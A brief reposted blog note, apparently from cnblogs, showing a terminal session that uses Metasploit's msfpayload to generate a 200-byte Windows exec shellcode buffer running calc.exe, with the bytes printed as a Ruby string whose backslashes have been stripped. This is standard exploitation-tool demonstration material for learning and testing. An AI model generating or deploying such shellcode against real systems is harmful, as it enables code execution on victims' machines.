msf generate exec payload

daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe N
WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1
# windows/exec - 200 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process, 
# CMD=calc.exe
buf =  ""
buf += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8b"
buf += "x52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
buf += "x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20"
buf += "xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8b"
buf += "x42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0"
buf += "x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8b"
buf += "x34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01"
buf += "xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2"
buf += "x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1c"
buf += "x01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5b"
buf += "x61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86"
buf += "x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8b"
buf += "x6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbd"
buf += "x9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb"
buf += "x47x13x72x6fx6ax00x53xffxd5x63x61x6cx63"
buf += "x2ex65x78x65x00"

  

原文地址:https://www.cnblogs.com/long123king/p/3835144.html